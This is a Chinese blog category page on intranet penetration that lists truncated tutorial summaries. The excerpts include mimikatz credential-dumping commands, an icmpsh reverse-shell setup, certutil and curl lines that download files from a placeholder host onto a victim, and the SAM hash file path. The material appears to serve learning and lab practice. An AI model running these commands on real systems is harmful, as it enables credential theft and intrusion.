随笔分类 -  内网渗透

此类用于学习内网渗透的一些小技巧
摘要:问题引入:winserver2012使用mimikatz是无法抓取明文密码的,要获取明文密码需要修改其注册表。 法一: 在未修改注册表的情况下,使用mimikatz来读取密码: privilege::debug sekurlsa::logonpasswordsmimikatz.exe "privil 阅读全文
posted @ 2023-02-16 17:35 铺哩 阅读(392) 评论(0) 推荐(1) 编辑
摘要:0x00 使用场景 最近遇到个项目需要走公网服务器的流量进行测试,不然waf会拦死,于是用别人的服务器搞了一上午,发现都没法代理出来,按照大哥的说法是,如果别人做的事情只要1天,那你就花3天的时间去做,不可能做不好的,确实管用。走某个网络的流量,只需要自己给自己开个代理即可,下面使用两种代理方式做演 阅读全文
posted @ 2022-04-05 20:30 铺哩 阅读(1980) 评论(0) 推荐(0) 编辑
摘要:0x00 实验环境 攻击机:win(192.168.43.10)+kali(192.168.43.243) 受害机: winserver2008(IP:192.168.43.146、192.168.127.157;双网卡,一个公网一个内网) winserver2012(IP:192.168.127. 阅读全文
posted @ 2021-11-04 21:32 铺哩 阅读(4871) 评论(0) 推荐(0) 编辑
摘要:攻防演练有看到大哥用这个做代理,今天学习一下 一、安装 https://github.com/ehang-io/nps/releases (下载Linux版本的先试试) 上传至服务器,新建一个nps的文件夹,然后解压: mkdir npstar -xzvf linux_amd64_server.ta 阅读全文
posted @ 2021-11-04 16:37 铺哩 阅读(6085) 评论(1) 推荐(0) 编辑
摘要:0x00 实验环境 攻击机:win(192.168.43.131)+kali(192.168.43.217) 受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网) 阅读全文
posted @ 2021-09-01 11:05 铺哩 阅读(927) 评论(0) 推荐(0) 编辑
摘要:利用ICMP隧道反弹shell (1)下载icmpsh: git clone https://github.com/bdamele/icmpsh.git (2)python安装类库python-impacket apt-get install python-impacket 注:必须下载安装pyth 阅读全文
posted @ 2021-08-31 11:04 铺哩 阅读(376) 评论(0) 推荐(0) 编辑
摘要:文章参考:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw 0x01 工具及环境搭建 (1)下载pystinger (Release模块) https://github.com/FunnyWolf/pystinger (2)内网环境: 攻击机:192 阅读全文
posted @ 2021-08-30 17:05 铺哩 阅读(1057) 评论(0) 推荐(0) 编辑
摘要:方法一: certutil -urlcache -split -f http://xx.xx.xx.xx/test.zip c:\test.zip (windows远程下载文件至本地,仅需要一个cmd执行的地方) 方法二: curl http://xx.xx.xx.xx/test.zip -o c: 阅读全文
posted @ 2021-06-07 16:03 铺哩 阅读(19721) 评论(1) 推荐(0) 编辑
摘要:一、sam特征 (1)全称: security account manager (2)存储位置: C:\windows\system32\config\SAM (3)一旦创建,即产生,一旦销毁,即消失,即使账号重复也将重新生成新的hash 二、提取sam密码 法一:提取命令:(win2K可以直接使用 阅读全文
posted @ 2021-05-17 10:37 铺哩 阅读(340) 评论(0) 推荐(0) 编辑
摘要:来自powershell的威力 阅读全文
posted @ 2019-07-23 21:18 铺哩 阅读(1297) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示